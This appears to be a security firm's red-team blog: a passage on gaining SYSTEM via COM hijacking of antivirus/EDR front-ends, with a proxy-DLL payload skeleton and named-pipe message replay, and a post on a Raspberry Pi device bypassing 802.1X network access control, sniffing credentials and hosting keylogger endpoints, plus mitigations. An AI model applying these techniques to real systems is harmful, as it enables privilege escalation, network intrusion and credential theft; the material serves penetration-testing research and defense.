#define ORIGINAL_COM_DLL_PATH "C:\\Windows\\System32\\dataxchange.dll"

void Go(void) {
// Our payload
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {

switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

typedef HRESULT(WINAPI * tDllGetClassObject)(REFCLSID rclsid, REFIID riid, LPVOID* ppv);

STDAPI DllGetClassObject(REFCLSID rclsid, REFIID riid, LPVOID FAR* ppv) {
// Start our payload
Go();

// Load the original DLL and proxy the function call to it
tDllGetClassObject pDllGetClassObject;
HMODULE hOrigDLL = LoadLibrary(ORIGINAL_COM_DLL_PATH);
pDllGetClassObject = (tDllGetClassObject) GetProcAddress(hOrigDLL, "DllGetClassObject");
if (!pDllGetClassObject)
return S_FALSE;

HRESULT hRes = pDllGetClassObject(rclsid, riid, ppv);

return hRes;
}

At this point, we achieved code execution in the context of the targeted product. So, the next step was to analyze the communication between the front-end and back-end processes for the specific product to get an idea of how to abuse this primitive.

Named pipe communication

Named pipes are a common method for communication between a server and one or more clients. They are accessible using a unique name (as the name suggests) and often serve as a communication channel between security products’ front-end and back-end processes.

Figure 6: Typical Named Pipe Communication via the WinAPI

We found that the easiest way to find out if a product uses named pipes was to use IONinja’s Pipe Monitor feature. For this, you click “New Session”, select “Pipe Monitor” and enable “Run as administrator”. You can click the “Capture” button in the top-right corner to start capturing named pipe traffic:

Figure 7: Starting IONinja
Figure 8: Listening to named pipes with IONinja

With this, you can interact with the product’s user interface to generate pipe traffic and watch for captured named pipe traffic that corresponds to the interaction. In our experience, there should be little named pipe communication on a vanilla system, so identifying the relevant communication should be straightforward if you have installed the product on a dedicated system.

Having identified the communication in IONinja, we have a pipe name and a process that opens the named pipe or writes to it. We now need to identify the logic. For this, we can look for strings beginning with \\.\pipe\, used when creating a named pipe. The logic that interacts with the named pipe will likely reference this string. You will also see calls to the CreateNamedPipe and ConnectNamedPipe functions.

For our initial target, all of this turned out to be unnecessary: When capturing data over a named pipe, we observed plaintext communication, including what appeared to be a registry key:

Figure 9: Registry path in named pipe traffic

The next section will detail how we exploited this communication to gain high privileges.

Replaying a recorded message

As shown in the screenshot above, the traffic on the named pipe for our first target contained a registry path and was not obfuscated. This message was sent every time we opened the front-end process.

Using Process Monitor, we observed that the back-end process accessed the registry key running as SYSTEM. This seemed promising, as writing a registry key as SYSTEM could lead to privilege escalation…

To test this theory, we implemented the following steps:

1. Prepare the Payload: We wrote a small program and converted it into shellcode using [donut](https://github.com/TheWover/donut).

2. Inject the Payload: Using our previously via COM hijacking loaded DLL, we injected the shellcode into the process. In the shellcode, we unloaded the DLL after a short sleep and then sent the modified data. This approach bypassed logic in the target process that appeared to validate loaded DLLs. Although we didn’t confirm whether bypassing this validation was essential, avoiding an unsigned DLL during communication helped minimize suspicion.

3. Initial Testing: To confirm our ability to replay the message, we modified the registry path in the recorded message. The modified path was successfully written to the registry:

Figure 10: Modified registry key written

We discovered that our ability to write registry keys was restricted to locations under the manufacturer’s designated registry path. This limitation prevented us from writing keys like RunOnce, which could enable privilege escalation.

However, we identified a promising registry key named Application Path. This key pointed to an application folder under C:\Program Files (x86). By modifying this path to one writable by us, we hypothesized that any high-privilege process loading from this path could execute our files, granting high privileges.

So, we modified the message again, choosing a path that would fit into the message without modifying any offsets. After injecting our DLL into the process, we replayed the modified message to overwrite the Application Path. Following a system restart, we observed that one of the privileged EDR processes executed files from the modified Application Path. By placing our payload in this directory, we successfully gained SYSTEM privileges:

Figure 11: Processes being started from modified path as SYSTEM

Conclusion

This blog post explored the attack surface associated with the interaction between an AV/EDR’s front-end and back-end processes. Key takeaways are:

  • Breaking Trust Assumptions: Using COM hijacking, we demonstrated how the assumption that the front-end process is inherently trusted can be exploited.
  • Finding Hijackable Interfaces: We described our methodology for identifying and hijacking COM interfaces.
  • Privilege Escalation via Named Pipes: We detailed how one target product communicated via named pipes and how replaying recorded messages enabled us to escalate privileges to SYSTEM.

In the next blog post, we will explore reversing RPC via COM and present a more complex exploit to achieve SYSTEM privileges by targeting another security product.

This article was written as part of joint research with Neodyme.

Further blog articles

Command-and-Control

Beacon Object Files for Mythic – Part 3

December 4, 2025 – This is the third post in a series of blog posts on how we implemented support for Beacon Object Files (BOFs) into our own command and control (C2) beacon using the Mythic framework. In this final post, we will provide insights into the development of our BOF loader as implemented in our Mythic beacon. We will demonstrate how we used the experimental Mythic Forge to circumvent the dependency on Aggressor Script – a challenge that other C2 frameworks were unable to resolve this easily.

Author: Leon Schmidt

Mehr Infos »
Command-and-Control

Beacon Object Files for Mythic – Part 2

November 27, 2025 – This is the second post in a series of blog posts on how we implemented support for Beacon Object Files (BOFs) into our own command and control (C2) beacon using the Mythic framework. In this second post, we will present some concrete BOF implementations to show how they are used in the wild and how powerful they can be.

Author: Leon Schmidt

Mehr Infos »
Command-and-Control

Beacon Object Files for Mythic – Part 1

November 19, 2025 – This is the first post in a series of blog posts on how we implemented support for Beacon Object Files into our own command and control (C2) beacon using the Mythic framework. In this first post, we will take a look at what Beacon Object Files are, how they work and why they are valuable to us.

Author: Leon Schmidt

Mehr Infos »
Red Teaming

The Key to COMpromise – Part 2

January 29, 2025 – In this post, we will delve into how we exploited trust in AVG Internet Security (CVE-2024-6510) to gain elevated privileges.
But before that, the next section will detail how we overcame an allow-listing mechanism that initially disrupted our COM hijacking attempts.

Author: Alain Rödel and Kolja Grassmann

Mehr Infos »
Red Teaming

The Key to COMpromise – Part 1

January 15, 2025 – In this series of blog posts, we cover how we could exploit five reputable security products to gain SYSTEM privileges with COM hijacking. If you’ve never heard of this, no worries. We introduce all relevant background information, describe our approach to reverse engineering the products’ internals, and explain how we finally exploited the vulnerabilities. We hope to shed some light on this undervalued attack surface.

Author: Alain Rödel and Kolja Grassmann

Mehr Infos »
Blog

Loader Dev. 4 – AMSI and ETW

April 30, 2024 – In the last post, we discussed how we can get rid of any hooks placed into our process by an EDR solution. However, there are also other mechanisms provided by Windows, which could help to detect our payload. Two of these are ETW and AMSI.

Author: Kolja Grassmann

Mehr Infos »
Blog

Loader Dev. 1 – Basics

February 10, 2024 – This is the first post in a series of posts that will cover the development of a loader for evading AV and EDR solutions.

Author: Kolja Grassmann

Mehr Infos »
Do you want to protect your systems? Feel free to get in touch with us.

Inside the NAC Pi

Search

Inside the NAC Pi

July 5, 2024

Inside the NAC Pi:
The journey of how we’ve built our own all-in-one device to bypass NAC (including 802.1X)

Network access control (short: “NAC”) are measures for protecting physical and wireless networks. They act as gatekeepers for clients that want to connect to the network. Without these measures, connecting a device to the network is as easy as plugging it into any Ethernet port and … you’re in!

MAC filtering simply hardcodes the MAC addresses that are allowed to connect to the network. While this is easy to bypass with MAC spoofing, it still requires an attacker to take extra steps to access the network.

NAC based on 802.1X on the other hand forces the connecting client to authenticate itself cryptographically against a trusted server. The server then decides whether the client is allowed to access the network. This is quite a complex thing so let’s look at how it works first.

Basics of 802.1X NAC

One way to implement NAC is by using a protocol called IEEE 802.1X, which is a port-based network access control (PNAC). This means that the boundary is the network switch port (the so-called “authenticator”) to which the client (the so-called “supplicant”) is directly connected. Packets originating from a client not able to authenticate must not pass this port. The authenticator in turn talks to the so-called “authentication server” via the RADIUS protocol (or any other AAA protocol), and the server eventually decides whether the supplicant is allowed to enter the network. This is where the actual authentication procedure takes place.

802.1X defines the encapsulation of the Extensible Authentication Protocol (EAP) over wired and 802.11 wireless networks, which is known as “EAP over LAN”, or “EAPOL” for short. This is the protocol used between the supplicant and the authenticator, the latter of which transmits the authentication data of the former. EAPOL is transmitted on OSI layer 2, so the supplicant doesn’t need an IP address to use it. The authenticator then takes the EAP proportion in the EAPOL packet and transmits it to the authentication server via RADIUS.

EAP packets being wrapped in EAPOL and RADIUS:

Figure 1: https://en.wikipedia.org/wiki/IEEE_802.1X#/media/File:802.1X_wired_protocols.png
Leon Schmidt

Consultant

Category
Date
Navigation

So far so good. We now have an authentication layer in our network, so what’s next? Well … nothing. 802.1X in its original form only adds authentication to the otherwise unprotected network. There are extensions to it, but all of them are optional and not considered here. See for more information: “Possible mitigations scenarios in which the NAC Pi doesn’t work”.

Reasons to bypass MAC filtering and 802.1X NAC

The most obvious reason to bypass network protections for an attacker of any kind is, surprise, surprise, gaining access to the network. An attacker being allowed at the switch port often means that they may obtain a network IP address via DHCP, which allows him to communicate with all devices on his LAN segment and often also beyond it. This opens many doors for attacks like ARP spoofing, packet sniffing, denial of service and so on – which applies to all reachable devices in the network.

But there is more. An assumption is made especially in 802.1X-secured networks which is not made in unprotected networks: The clients in the network can be trusted, as they have authenticated themselves cryptographically, right? Well yes, but this statement is only true until some adversary bypasses this authentication. This would allow the attacker to spy on and act like a trusted client within the trusted network. Additionally, being physically “on the wire” between the supplicant and the authenticator might even allow for advanced techniques like relaying attacks, for example using the tool ntlmrelayx (https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py).

A little bit of theory and why NAC bypasses are possible

But how exactly can we bypass the 802.1X NAC authentication process? Breaking it cryptographically is not a reasonable option due to state-of-the-art cryptography being used (at least most of the time). The other option is to bypass it physically by letting the supplicant do its authentication and somehow using the link in its already authenticated state.

There is a tool that does exactly this: Sitting in between a supplicant and an authenticator with the goal to let the supplicant authenticate itself and then injecting traffic into the authenticated link to effectively bypass 802.1X. The tool is called silentbridge and can be found on GitHub (https://github.com/s0lst1c3/silentbridge). It is meant to be run on a Linux device and creates a transparent Linux network bridge connecting supplicant, authenticator, and a side-channel interface (from where the traffic is injected).

In theory, we then just wait for the supplicant to authenticate itself to the network over the transparent bridge by forwarding the supplicant’s EAPOL frames to the authenticator. For security reasons, this is prevented by default in standard Linux network bridges (actually to prevent exactly attacks like this). In earlier versions of the Linux kernel, it was necessary to apply a kernel patch to reactivate EAPOL forwarding; today this can be done via the virtual sys file system. With the bridge configured to forward EAPOL frames, the attacker only needs to wait for the supplicant to complete the authentication process.

Port-based NAC effectively uses the MAC address to identify the supplicant, meaning that all packets originating from this address are allowed to pass the NAC, which is also true for MAC filtering. The link state is also monitored to enforce reauthentication in the event of a link termination. So, the only thing we need to do now is to use IP- and MAC-based source NAT to rewrite the source address of all packets originating from our silentbridge device or its side-channel interface to match the supplicant. However, port-based NAC is strict enough that even a single packet with the wrong MAC address on an authorized port immediately closes the port again. We must therefore always ensure that packets are only sent once this NATing is fully set up. This is called “start dark” in silentbridge terminology and has the drawback that once the rogue device is introduced onto the link, the connection is interrupted for some seconds. Consequently, we need to make sure that the supplicant can reauthenticate itself in order to keep the link in an authenticated state.

The cool thing about this is that the actual technical implementation of the authentication process is completely irrelevant for this approach, as we do not intervene in it directly. We simply let the supplicant do its thing. We’ve tested the authentication protocols “PEAP-MSCHAPv2” and “EAP-TLS” from 802.1X-2004 as well as networks that aren’t using 802.1X at all but might use MAC filtering. This means that this procedure is applicable to both all variants of 802.1X-2004 and MAC filtering. Nice!

All these things and a few more to keep the bridge invisible in the network are done by silentbridge. But we are still missing some vital information: In order to perform the source NAT, silentbridge needs to know which source address to use to overwrite the ones from of the outgoing packets. Consequently, we must determine the IP and MAC address of the supplicant. Silentbridge also sets static ARP entries to reach the switch, on which the authenticator runs, and the networks gateway so our own packets can be routed correctly. This is done manually in order to stay silent in the “start dark” stage. The authenticator ARP entry is required for EAPOL packets since they must reach the switch directly on layer 2. This means, we also need to acquire the MAC addresses of our authenticator and gateway before starting the actual attack.

Finding these is a simple but time-consuming process if done manually, especially if you think of a red-teaming scenario, where you don’t have all the time in the world to spin up Wireshark first. We need a better approach for this…

Sticking it all together: Genesis of the NAC Pi

Ok, so we now have some knowledge of MAC filtering, 802.1x and a tool to bypass them, but we still need the required network information. Now, where do we start? We build a hardware appliance for it!

We have chosen the Raspberry Pi 4 B for this purpose. It’s small, can be powered with USB-C and is more than capable to handle packet bridging. We use USB-Ethernet adapters to add more physical interfaces to the Raspberry Pi. Software-wise, we have developed multiple scripts that instrument silentbridge to perform the 802.1X bypass fully automated by doing the following steps:

  1. Detecting connected devices to confirm that bridging and injection via the side-channel interface is possible.
  2. Creating the transparent bridge with silentbridge without adding the side-channel yet.
  3. Preventing locally generated packets from leaving the NAC Pi (“start dark”) but leaving the bridging intact.
  4. Running a tcpdump on the bridge to collect the supplicant IP and MAC address as well as the switch and gateway MAC address (this is not as easy as it sounds).
  5. Adding the side-channel to the bridge and applying all iptables and arptables rules required for the source NAT.
  6. “Lifting the radio silence” created by the “start dark” action in step 3.

This eventually leads to the fact that we can now inject traffic onto the authenticated link via the side-channel and from the NAC Pi itself by impersonating the authenticated supplicant!

Figure 2: The NAC Pi intercepting the secure 802.1X channel (illustration created by cirosec)

But we haven’t yet defined what the side-channel is. This is where the NAC Pi shines: This can be literally any device that can be represented as a Linux network interface. Currently, two possible side-channels are supported by our NAC Pi: a physical LAN device (like an attacker notebook) connected directly to it or a device in a OpenVPN tunnel that was created via LTE to allow for remote injection.

Traffic injection methods: LAN and VPN over LTE

In LAN mode, the NAC Pi’s side-channel is a physical device connected to one of the USB-Ethernet adapters. This is the simplest way of injecting traffic but requires a dedicated device on site with custom network settings, as the side-channel network is a special subnet only used in LAN mode. For advanced scenarios, up to 13 additional devices can be connected to this subnet, e.g., by using a switch between the NAC Pi and its side-channel devices.

In LTE mode, the side-channel is a tunnel device. It belongs to an OpenVPN connection to one of our servers intended for NAC Pi traffic injection. The connection is established via an LTE modem connected to the NAC Pi. This way, the connection is not dropped by some corporate firewall that prevents outgoing VPN connections. One of our pentesters can now connect to the OpenVPN server from any device within our IP address range, routing all of its traffic to it. The server then routes the incoming traffic from the consultant back into the VPN tunnel established from the NAC Pi. It eventually reaches the tunnel device defined as the silentbridge side-channel.

We also wanted to be able to deploy multiple NAC Pi’s at the same time. Each NAC Pi has been assigned an instance number that determines to which private OpenVPN network it connects. In addition, several OpenVPN configuration files have been created for the consultants, which are also assigned to a specific private network. The OpenVPN server routes the respective packets to the correct NAC Pi using policy-based routing, as can be seen in Figure 3. This way, the consultant can virtually choose the NAC Pi into which he wants to inject traffic remotely. In a large network, for example, several network segments or clients can be infiltrated simultaneously. Furthermore, several consultants can connect to one NAC Pi using the same OpenVPN configuration file to work in parallel, similar to LAN mode.

Figure 3: Policy-based routing on the VPN, allowing multiple NAC Pi instances and consultants to connect (illustration created by cirosec)

In both modes, the traffic-injecting side-channel device can target the NAC Pi directly via the subnet’s first available host address. This is required for DNS redirecting (more on this later) and to connect to it via SSH.

The side-channel mode in which the NAC Pi operates is determined at boot time depending on the devices connected to it. It uses udev with a combination of USB port number rules and USB vendor/product IDs to determine whether an LTE modem and if or how many USB-Ethernet adapters are connected. The latter is required so the NAC Pi operator knows to which USB port it needs to attach the adapters. The same udev rules then create named interfaces from those adapters which are in turn given to silentbridge. The boot script also automatically establishes the VPN connection if an LTE modem is detected.

A little fact in passing: For all networks created by the NAC Pi, we use addresses within the reserved carrier grade NAT subnet 100.64.0.0/10. But why not use the private IPv4 ranges instead? We observed that using a network like 10.0.0.0/8 runs the risk of colliding with addresses within the target network. First, we’ve used IPv4 link-local addresses (the ones you get when you don’t have a DHCP server in your network, but your interface is configured to use one), but they had a major drawback: On Linux, those addresses are not routable because, well, they are link-local. This meant that we couldn’t use Linux devices as side-channel devices. So, we switched to the carrier grade NAT subnet. It is used nearly nowhere in networks meant for usual clients while it also has the characteristics of being globally routable (which we do not need in our case, because we only use it for NAT). So, a perfect match for us!

But wait … there is more!

It would be a shame having a hardware appliance that bypasses NACs but does nothing more than this. Over time, our NAC Pi has evolved into a complex network attack framework supplying advanced DNS features to the operator, allowing for easy on-link credential sniffing and even providing an endpoint for Wi-Fi keyloggers. But one thing at a time.

DNS redirection service

One problem we had was the fact that the attacker’s device connected to the side-channel interface wasn’t a fully-fledged network participant. The device has not been assigned a network-valid IP address, and no DHCP traffic reaches it, as the client only sees its connection up to the NAC Pi. Everything else is invisible bridging and routing. This means that the attacker is not aware of any of the network’s information, including the internal DNS server. For some scenarios, this is bad: Let’s assume the attacker wants to access an internal web service. Sure, he can just enter the IP address to begin with, but what if the page’s JavaScript loads additional resources or data from let’s say “https://company.local/api”? Translating all calls with the corresponding IP addresses is not a trivial task and takes time. To solve this problem, our NAC Pi has a built-in DNS redirection service: While analyzing the bridge traffic to find out the required addresses for silentbridge, it also tries to find out where most of the DNS requests are sent to – and assumes that this is the network’s primary DNS server. The NAC Pi then creates iptables rules to redirect all DNS packets destined for it to this server. The attacker can now specify the NAC Pi as his DNS server (whose address is known to him), which will then redirect all DNS traffic to the detected DNS server, allowing the attacker to resolve internal hostnames, as if he would actually know the network’s DNS server. Nice!

Credential sniffing with BruteShark

We are physically sitting on a link between an authenticated supplicant and the network. It would be such a wasted potential to not take a quick look at what the supplicant is transmitting into the network. In Windows environments, the domain-joined clients usually transmit Kerberos packets over the wire. We use the CLI version of BruteShark (https://github.com/odedshimon/BruteShark) to extract those Kerberos tickets from the bridge, which we can then offline-brute-force with Hashcat. BruteShark is also capable of extracting plaintext credentials from unencrypted protocols like SMTP and IMAP, but also from HTTP URLs, headers, and POST payloads, which can be seen in Figure 4.

Figure 4: Using BruteShark to sniff credentials – it has detected plaintext passwords transmitted via HTTP basic authentication

BruteSharkCli is embedded into nacpi-ctl, which we will cover later. This makes launching it as easy as executing “nacpi-ctl sniff-passwords” from the command line.

Wi-Fi access point for Wi-Fi keyloggers

In one of our penetration tests, where our NAC Pi was used for the first time, we also wanted to place some hardware keyloggers on some clients. These keyloggers had the ability to stream keystrokes over UDP, acting as Wi-Fi clients. The SSID and credentials for an access point needed to be configured before placing them in front of the target keyboard. We thought “hey, it would be nice if we would just bring in our own Wi-Fi network,” because we didn’t have the credentials to connect to the customer network yet. But we already wanted to place some NAC Pis into the network … which are effectively Raspberry Pis … which has a Wi-Fi card on-board … and also a dedicated Internet uplink over LTE. What a coincidence!

So, we used hostapd, a Linux tool to turn Wi-Fi cards into Wi-Fi access points. We set the same SSID and passphrase on all NAC Pis, effectively creating a fake mesh network: Clients connecting to this network simply use the nearest access point. To prevent signal interference, each NAC Pi uses a different Wi-Fi channel calculated via its VPN instance number set at installation. Now we have an access point for all our keyloggers. But we still need a UDP server to which the keyloggers can stream their keystrokes …

We decided to use a centralized server for this instead of collecting the keystrokes on each NAC Pi separately: our VPN gateway. First, the NAC Pi is configured as the UDP target for the keyloggers, because we already know the address (it’s simply the NAC Pi’s address inside the Wi-Fi network). The NAC Pi then takes these UDP packets and redirects them through the VPN tunnel to the VPN gateway. This also makes sure that we do not transfer potentially sensitive credentials unencrypted. On the VPN gateway, there is a small Go application that simply writes all incoming UDP traffic into a file. And this is the file where we will find our keystrokes!

To be able to differentiate from which keylogger the keystrokes are coming, they can identify themselves by setting different port numbers for the target UDP server: Sending packets to port 40001 identifies the keylogger as “keylogger 1”, 40002 as “keylogger 2” and so on. The Go application on the VPN server listens on a range of different ports and writes incoming traffic to different files, respectively. The server’s firewall is configured to only allow connections to the UDP endpoint from within the NAC Pi VPN tunnels.

Figure 5: Looking into the keystroke file from keylogger 1

Since the Wi-Fi access point uses the LTE uplink, we can also use it to ask our ISP about the remaining data volume, e.g., by connecting a phone to the access point. We also enabled the SSH listener for the Wi-Fi interface to be able to access the NAC Pi even when the side-channel devices cannot be accessed or something else goes wrong.

Controlling behavior with nacpi-ctl

That’s a hell of a lot of features. Most of them work with the default configuration – but keep in mind that this is a hacking tool! Hackers are not exactly known to interact with software and hardware as intended. That’s why we introduced nacpi-ctl – a command line tool to configure and use specific features of our NAC Pi at runtime.

nacpi-ctl, allows us to investigate its overall status (see Figure 6), to control the mapping of the peripherals, to control the Wi-Fi access point, to check LTE mobile data volume, to supply the attack script with network information if known, to skip the packet sniffing at boot time, or to launch any of the features like the beforementioned credential sniffing. We also added a function to clear information collected during a red teaming reliably, to protect the customer’s privacy when reusing the NAC Pi – just like a factory reset.

Figure 6: The nacpi-ctl status command shows detected network information

nacpi-ctl was built with Python using the Typer library (https://github.com/tiangolo/typer). It’s really “just” a stateless tool to keep track of udev rules, systemd services and some other configuration files. But it definitely made interaction with the NAC Pi much easier.

Streamlining the NAC Pi and gateway deployment processes

To simplify the deployment of our NAC Pi, all changes to the attack script, nacpi-ctl and the configuration files are kept in an internal GitLab repository and are bundled in a single deployment script. Everything you need to do in order to deploy a NAC Pi is to flash Raspbian OS Lite on an SD card, plug it into a Raspberry Pi 4 B, clone the repository on there and run the deployment script. It asks you for the VPN instance number and that’s it! After a reboot the NAC Pi is ready to go.

Figure 7: Installing a new NAC Pi with deploy.sh

To simplify deployment even further, we have been providing pre-build images for each NAC Pi instance in recent versions, which can be flashed directly onto an SD card. The manual execution of the deployment script is therefore also obsolete. We have forked the pi-gen tool (https://github.com/RPi-Distro/pi-gen), which is also used to build the official Raspberry Pi images and adapted it so that the deployment script is also executed during the build process. This also makes it easier for us to control and determine which Raspberry Pi OS version the NAC Pi software will ultimately run on.

To manage the OpenVPN server for the NAC Pis in LTE mode, we use Ansible to deploy and maintain it. It also ensures a correct firewall configuration so that NAC Pis are allowed to connect from anywhere, but traffic injection is only possible from within the cirosec IP address ranges. The Ansible script also manages the UDP keylogger endpoints and its firewall rules on the server.

Possible mitigations scenarios in which the NAC Pi doesn’t work

Yes, you can protect yourself from this rogue device!

There is an EAPOL extension called IEEE 802.1AE (“MACsec”), which adds confidentiality and integrity to the network security cocktail. This means, we not only need to bypass authentication but encryption and key exchange mechanisms, too. Currently, this is not supported by our NAC Pi appliance. MACsec is used in 802.1X-2010, so any variant of 802.1X higher than the 2004 version is not vulnerable to be attacked with the NAC Pi. The problem, however, is that MACsec is currently not supported by most operating systems including Windows. Although this functionality can be retrofitted to client devices by using tools like Cisco AnyConnect with Network Access Manager (NAM), it is far from being applicable to all network devices, such as printers. They will still have to use fallback mechanisms like 802.1X-2004 to be able to use the network. Therefore, printers will probably remain a good target for us for the time being.

However, even though our NAC Pi currently can’t bypass MACsec, silentbridge itself actually can under certain circumstances: Using a “rogue gateway attack”, an attacker can effectively steal EAP credentials by diverting the supplicant’s traffic to a rogue authenticator through mechanical switching at the right time. This requires two physical A/B splitters, which function like rail switches: They can be programmatically set to either connect to the rogue device (the NAC Pi in this case) or to connect to each other directly, effectively bypassing the NAC Pi. Connecting the splitters with the rogue device allows the latter to temporarily act as the authenticator to steal the EAP credentials transmitted by the supplicant. After setting the splitters to bypass the rogue device again, the stolen credentials are then utilized by the rogue device to perform authentication on its own, without having to rely on the supplicant. This attack can even be improved by using a “bait ‘n’ switch attack”, where the supplicant is additionally forced to disconnect and reauthenticate itself. While reauthenticating, the credentials can be stolen in a more reliable way. Nevertheless, both variants only work with weak EAP methods, like EAP-MD5, and with the splitters as mentioned – thus requiring knowledge in electrics assembly and wiring. But maybe this complex attack will also find its way into our NAC Pi one day…

It is also always a good idea to adhere to other security recommendations for networks. Strong network segmentation does not help against NAC attacks, but it does make it much more difficult for an attacker to actually attack systems within the network or obtain valuable information from them. We’ve also seen customers of us using VPN within the company’s network to force clients to authenticate on the application layer, even when in the office. Firewall rules, for example, were then taken from the Active Directory based on the logged-in user and are only valid within the cryptographically secure VPN tunnel, rendering network attacks without having access to a valid user useless. Zero Trust is another such approach, which has a similar claim to isolation and micro segmentation and offers a good second-level protection, too. Networks with such configurations make our work much more difficult (in a good sense): The NAC Pi is still usable, but in most cases, it no longer yields any added value to us.

We also encountered problems in environments where there is simply no wired LAN available and only Wi-Fi was in use. In this case, the connection is already encrypted, and the NAC Pi cannot be deployed as a man-in-the-middle device, besides it not having support for Wi-Fi interfaces at all. Good physical security has also often prevented the placement of the NAC Pi: access restrictions or enforced supervision by an employee for rooms with computers and especially for server rooms are invaluable, especially to prevent network attacks like this. So, keep in mind: The most secure network is one in which nothing is accessible by default.

We currently do not plan to publish our source code for the NAC Pi. The defense line has fallen for every one of our customers, who have been convinced by their NAC solution, where we have deployed the NAC Pi. We do not consider ourselves responsible for passing on such a tool to the public as long as this is the case. We know that there are other public NAC bypassing tools, but we are not aware of any that can cause damage outside the local network boundaries. The addition of the VPN gateway and LTE mode of the NAC Pi makes it far more dangerous than the existing tools we are aware of. The built-in, automatable man-in-the-middle functions, such as the extraction of Kerberos credentials and the ability to transfer observed keystrokes to a central server through the Wi-Fi access point, are also not part of the tools known to us. Through this article, however, we want to draw attention to the fact that tools like this one exist and clarify that you should never be complacent despite a seemingly good NAC solution.

Further blog articles

Blog

Loader Dev. 4 – AMSI and ETW

April 30, 2024 – In the last post, we discussed how we can get rid of any hooks placed into our process by an EDR solution. However, there are also other mechanisms provided by Windows, which could help to detect our payload. Two of these are ETW and AMSI.

Author: Kolja Grassmann

Mehr Infos »
Blog

Loader Dev. 1 – Basics

February 10, 2024 – This is the first post in a series of posts that will cover the development of a loader for evading AV and EDR solutions.

Author: Kolja Grassmann

Mehr Infos »
Do you want to protect your systems? Feel free to get in touch with us.
Search
Search